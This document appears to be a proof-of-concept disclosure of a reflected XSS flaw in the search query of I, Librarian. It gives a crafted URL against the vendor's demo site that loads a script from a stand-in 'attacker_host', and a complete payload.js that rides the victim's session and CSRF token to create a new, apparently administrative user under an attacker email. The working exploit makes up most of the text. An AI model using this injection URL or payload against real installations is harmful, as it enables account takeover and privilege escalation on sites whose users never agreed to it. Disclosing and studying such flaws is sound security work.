Reflected XSS (Cross-Site Scripting) is a common web security vulnerability that can occur when a user inputs malicious Javascript syntax into the search field.
The search function allows users to look for content on the website, and the search keywords are appended to the URL query string. If the website fails to properly filter and prohibit unvalidated input in the search query string, this can provide an opportunity for attackers to inject malicious code.
Attackers can construct a malicious search query string and inject Javascript code into it. When a victim accesses the link through the search keywords, the browser will parse the query string and execute the Javascript code, allowing the attacker to successfully carry out their attack.
https://i-librarian.net/demo/index.php/#items/main?search_query%5B%5D=%3Cscript%20src%3D%22%2F%2Fattacker_host%2Fpayload.js%22%3E%3C%2Fscript%3E&search_boolean%5B%5D=AND&search_type%5B%5D=anywhere
# playload.js
function payload() {
const data = "user%5Busername%5D=&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Bemail%5D=attacker%40mail.com&user%5Bpermissions%5D=A&csrfToken=" + csrfToken;
const xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.addEventListener("readystatechange", function () {
if (this.readyState === this.DONE) {
alert(this.responseText);
}
});
xhr.open("POST", "/index.php/users/create");
xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; rv:112.0) Gecko/20100101 Firefox/112.0");
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Accept-Encoding", "gzip, deflate, br");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("X-Client-Width", "1512");
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.setRequestHeader("Origin", "https://i-librarian.net");
xhr.setRequestHeader("DNT", "1");
xhr.setRequestHeader("Connection", "keep-alive");
xhr.setRequestHeader("Referer", "https://i-librarian.net/");
xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
xhr.setRequestHeader("Sec-Fetch-Mode", "cors");
xhr.setRequestHeader("Sec-Fetch-Site", "same-origin");
xhr.setRequestHeader("Sec-GPC", "1");
xhr.setRequestHeader("Pragma", "no-cache");
xhr.setRequestHeader("Cache-Control", "no-cache");
xhr.send(data);
}
setTimeout(payload, 2000);